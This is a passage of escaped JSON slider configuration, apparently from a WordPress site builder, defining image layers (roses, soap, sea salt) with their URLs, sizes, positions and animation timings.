From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"ABC\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic6.png\",\"imageId\":3311},\"size\":{\"width\":{\"d\":{\"v\":\"1629px\",\"e\":true},\"n\":{\"v\":\"1360px\",\"e\":true},\"t\":{\"v\":\"1269px\",\"e\":true},\"m\":{\"v\":\"1269px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"1105px\",\"e\":true},\"n\":{\"v\":\"923px\",\"e\":true},\"t\":{\"v\":\"862px\",\"e\":true},\"m\":{\"v\":\"862px\",\"e\":true}},\"originalWidth\":1629,\"originalHeight\":1105,\"aspectRatio\":{\"d\":{\"v\":1.4742081447963802},\"n\":{\"v\":1.4742081447963802},\"t\":{\"v\":1.4742081447963802},\"m\":{\"v\":1.4742081447963802}}},\"position\":{\"x\":{\"d\":{\"v\":\"-35px\",\"e\":true},\"n\":{\"v\":\"-9px\",\"e\":true},\"t\":{\"v\":\"-250px\",\"e\":true},\"m\":{\"v\":\"-274px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-24px\",\"e\":true},\"n\":{\"v\":\"-100px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"47px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Roses\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/h4-slide1-graphic2-1.png\",\"imageId\":4208},\"size\":{\"width\":{\"d\":{\"v\":\"375px\",\"e\":true},\"n\":{\"v\":\"250px\",\"e\":true},\"t\":{\"v\":\"250px\"},\"m\":{\"v\":\"105px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"391px\",\"e\":true},\"n\":{\"v\":\"261px\",\"e\":true},\"t\":{\"v\":\"261px\"},\"m\":{\"v\":\"110px\",\"e\":true}},\"originalWidth\":416,\"originalHeight\":434,\"aspectRatio\":{\"d\":{\"v\":0.9585253456221198},\"n\":{\"v\":0.9585253456221198},\"t\":{\"v\":0.9585253456221198},\"m\":{\"v\":0.9585253456221198}}},\"position\":{\"x\":{\"d\":{\"v\":\"-70px\",\"e\":true},\"n\":{\"v\":\"-21px\",\"e\":true},\"t\":{\"v\":\"-21px\"},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-43px\",\"e\":true},\"n\":{\"v\":\"-38px\",\"e\":true},\"t\":{\"v\":\"-38px\"},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Soap\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic3.png\",\"imageId\":3313},\"size\":{\"width\":{\"d\":{\"v\":\"334px\",\"e\":true},\"n\":{\"v\":\"216px\",\"e\":true},\"t\":{\"v\":\"134px\",\"e\":true},\"m\":{\"v\":\"134px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"313px\",\"e\":true},\"n\":{\"v\":\"202px\",\"e\":true},\"t\":{\"v\":\"125px\",\"e\":true},\"m\":{\"v\":\"125px\",\"e\":true}},\"originalWidth\":334,\"originalHeight\":313,\"aspectRatio\":{\"d\":{\"v\":1.0670926517571886},\"n\":{\"v\":1.0670926517571886},\"t\":{\"v\":1.0670926517571886},\"m\":{\"v\":1.0670926517571886}}},\"position\":{\"x\":{\"d\":{\"v\":\"290px\",\"e\":true},\"n\":{\"v\":\"279px\",\"e\":true},\"t\":{\"v\":\"32px\",\"e\":true},\"m\":{\"v\":\"42px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"70px\",\"e\":true},\"n\":{\"v\":\"105px\",\"e\":true},\"t\":{\"v\":\"139px\",\"e\":true},\"m\":{\"v\":\"109px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":170},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2260,\"start\":170,\"startRelative\":170},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2260,\"start\":170,\"startRelative\":170},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":6570,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Sea salt\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic1.png\",\"imageId\":3314},\"size\":{\"width\":{\"d\":{\"v\":\"336px\",\"e\":true},\"n\":{\"v\":\"225px\",\"e\":true},\"t\":{\"v\":\"225px\"},\"m\":{\"v\":\"147px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"288px\",\"e\":true},\"n\":{\"v\":\"193px\",\"e\":true},\"t\":{\"v\":\"193px\"},\"m\":{\"v\":\"126px\",\"e\":true}},\"originalWidth\":336,\"originalHeight\":288,\"aspectRatio\":{\"d\":{\"v\":1.1666666666666667},\"n\":{\"v\":1.1666666666666667},\"t\":{\"v\":1.1666666666666667},\"m\":{\"v\":1.1666666666666667}}},\"position\":{\"x\":{\"d\":{\"v\":\"419px\",\"e\":true},\"n\":{\"v\":\"401px\",\"e\":true},\"t\":{\"v\":\"48px\",\"e\":true},\"m\":{\"v\":\"48px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"67px\",\"e\":true},\"n\":{\"v\":\"39px\",\"e\":true},\"t\":{\"v\":\"26px\",\"e\":true},\"m\":{\"v\":\"26px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":70},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":\"{-90,90}\",\"rotationZ\":\"45deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1160,\"start\":70,\"startRelative\":70},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1160,\"start\":70,\"startRelative\":70},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 